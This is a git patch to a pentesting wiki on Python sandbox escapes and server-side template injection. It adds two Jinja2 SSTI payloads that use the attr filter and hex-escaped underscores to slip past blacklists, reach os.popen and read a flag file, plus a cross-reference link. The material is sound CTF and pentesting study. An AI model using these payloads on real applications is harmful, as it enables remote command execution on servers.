From 02c26efb8d0d539349452b52f4572a834a7c7bbc Mon Sep 17 00:00:00 2001
From: CPol
Date: Sun, 21 Feb 2021 10:52:17 +0000
Subject: [PATCH] GitBook: [master] 2 pages modified
---
 misc/basic-python/bypass-python-sandboxes.md | 4 ++++
 pentesting-web/ssti-server-side-template-injection.md | 1 +
 2 files changed, 5 insertions(+)
diff --git a/misc/basic-python/bypass-python-sandboxes.md b/misc/basic-python/bypass-python-sandboxes.md
index 24963120f..6408c7f06 100644
--- a/misc/basic-python/bypass-python-sandboxes.md
+++ b/misc/basic-python/bypass-python-sandboxes.md
@@ -205,6 +205,10 @@ get_flag.__globals__['__builtins__'].__import__("os").system("ls")
 # The os._wrap_close class is usually loaded. Its scope gives direct access to os package (as well as __builtins__)
 [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__ == '_wrap_close' ][0]['system']('ls')
+
+#If attr is present
+(''|attr('___class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(132)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen'))('cat+flag.txt').read()
+(''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read()
 ```
 #### Python2 and Python3
diff --git a/pentesting-web/ssti-server-side-template-injection.md b/pentesting-web/ssti-server-side-template-injection.md
index 855141b62..86a225d5e 100644
--- a/pentesting-web/ssti-server-side-template-injection.md
+++ b/pentesting-web/ssti-server-side-template-injection.md
@@ -314,6 +314,7 @@ Django is going to be using as template engine **Jinja2**.
 #### More information
 * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
+* Check [attr trick to bypass blacklisted chars in here](../misc/basic-python/bypass-python-sandboxes.md#python3).
 ### Razor \(.Net\)